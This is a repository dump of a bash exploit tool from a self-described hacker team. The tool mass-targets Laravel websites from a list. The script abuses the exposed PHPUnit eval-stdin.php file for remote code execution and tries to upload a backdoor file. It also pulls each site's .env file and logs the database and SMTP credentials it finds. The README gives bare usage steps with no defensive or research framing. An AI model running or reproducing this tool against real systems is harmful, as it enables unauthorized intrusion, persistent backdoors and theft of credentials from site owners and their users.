├── rce.jpg ├── README.md └── laraxpl.sh /rce.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vsec7/Laravel-PhpUnit-Rce-And-Get-Env-Exploiter/master/rce.jpg -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Laravel-PhpUnit-Rce-And-Get-Env-Exploiter 2 | Laravel PhpUnit Rce And Get Env Exploiter 3 | 4 | ## Screenshot 5 | ![Exploiter](https://raw.githubusercontent.com/vsec7/Laravel-PhpUnit-Rce-And-Get-Env-Exploiter/master/rce.jpg) 6 | 7 | ## Usage 8 | ``` 9 | chmod +x laraxpl.sh 10 | ./laraxpl.sh 11 | ``` 12 | 13 | ### By : Versailles ( Sec7or Team ~ Surabaya Hacker Link ) 14 | -------------------------------------------------------------------------------- /laraxpl.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # Laravel PhpUnit Rce & Get Env 3 | # Coded By Viloid 4 | # Sec7or Team ~ Surabaya Hacker Link 5 | # Usage : ./laraxpl.sh 6 | 7 | R='\033[0;31m' 8 | G='\e[32m' 9 | O='\033[0;33m' 10 | N='\033[0m' 11 | 12 | header(){ 13 | cat <" "$1/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php") 27 | uname=$(echo $g | grep -oP 'Cans21 :\K[^:]+') 28 | if [[ ! -z $uname ]]; then 29 | rc="${G}RCE${N}" 30 | un="${G}[*] Kernel : $uname${N}${N}" 31 | if [[ $(curl -s $1/vendor/phpunit/phpunit/src/Util/PHP/cans.php | grep -ic "Cans21") -eq 1 ]]; then 32 | shell="${G}[*] Successfully Uploaded : ${O}$1/vendor/phpunit/phpunit/src/Util/PHP/cans.php${N}" 33 | echo "$1/vendor/phpunit/phpunit/src/Util/PHP/cans.php" >> laravel-rce-log.txt 34 | else 35 | shell="${R}[-] Failed Uploading Backdoor${N}" 36 | fi 37 | loc="\n$un\n$shell\n" 38 | else 39 | rc="${R}RCE${N}" 40 | fi 41 | } 42 | 43 | env(){ 44 | g=$(curl -s "$1/.env") 45 | db_host=$(echo $g | grep -oP 'DB_HOST=\K[^ ]+') 46 | db=$(echo $g | grep -oP 'DB_DATABASE=\K[^ ]+') 47 | db_u=$(echo $g | grep -oP 'DB_USERNAME=\K[^ ]+') 48 | db_p=$(echo $g | grep -oP 'DB_PASSWORD=\K[^ ]+') 49 | m_host=$(echo $g | grep -oP 'MAIL_HOST=\K[^ ]+') 50 | m_port=$(echo $g | grep -oP 'MAIL_PORT=\K[^ ]+') 51 | m_u=$(echo $g | grep -oP 'MAIL_USERNAME=\K[^ ]+') 52 | m_p=$(echo $g | grep -oP 'MAIL_PASSWORD=\K[^ ]+') 53 | 54 | if [[ -z $db_host ]]; then 55 | en="${R}DB${N}" 56 | else 57 | en="${G}DB${N}" 58 | dbs="${G}\n [*] DB_HOST : $db_host\n [*] DB_DATABASE : $db\n [*] DB_USERNAME : $db_u\n [*] DB_PASSWORD : $db_p\n${N}" 59 | echo "$1 | DATABASE : $db_host | $db | $db_u | $db_p" >> laravel-env-log.txt 60 | if [[ -z $m_host || $m_host == "null" || $m_host == "localhost" || $m_host == "mailtrap.io" || $m_host == "smtp.mailtrap.io" ]]; then 61 | sm="${R}SMTP${N}" 62 | else 63 | sm="${G}SMTP${N}" 64 | smtp="${G}\n [*] MAIL_HOST : $m_host\n [*] MAIL_PORT : $m_port\n [*] MAIL_USERNAME : $m_u\n [*] MAIL_PASSWORD : $m_p\n${N}" 65 | echo "$1 | SMTP : $m_host | $m_port | $m_u | $m_p" >> laravel-env-log.txt 66 | fi 67 | fi 68 | 69 | } 70 | 71 | exploit(){ 72 | u=$(echo $1 | grep -Po '.*?//.*?(?=/)') 73 | env $u && rce $u 74 | echo -e "[$w][$2/$tot] $1 [$en][$sm][$rc]$dbs$smtp$loc" 75 | } 76 | 77 | header 78 | 79 | read -p "[?] List Target : " l 80 | if [[ ! -f $l ]]; then 81 | echo "[-] File $l Not Exist!" 82 | exit 1 83 | fi 84 | 85 | read -p "[?] Threads (Default 10): " t 86 | if [[ $t="" ]]; then 87 | t=10; 88 | fi 89 | 90 | read -p "[?] Delay (Default 1): " s 91 | if [[ $s="" ]]; then 92 | s=1; 93 | fi 94 | 95 | echo 96 | echo -e "[!] ${G}Target Loaded : ${O}$(wc -l $l)${N}" 97 | echo -e "[!] ${G}Thread : ${O}$t${N}" 98 | echo -e "[!] ${G}Delay : ${O}$s sec${N}" 99 | echo -e "[+] ${G}Start Exploit.......${N}\n" 100 | 101 | n=1 102 | IFS=$'\r\n' 103 | for i in $(cat $l); do 104 | f=$(expr $n % $t) 105 | if [[ $f == 0 && $n > 0 ]]; then 106 | sleep $s 107 | fi 108 | w=$(date '+%H:%M:%S') 109 | tot=$(cat $l | wc -l) 110 | exploit $i $n & 111 | n=$[$n+1] 112 | done 113 | wait 114 | --------------------------------------------------------------------------------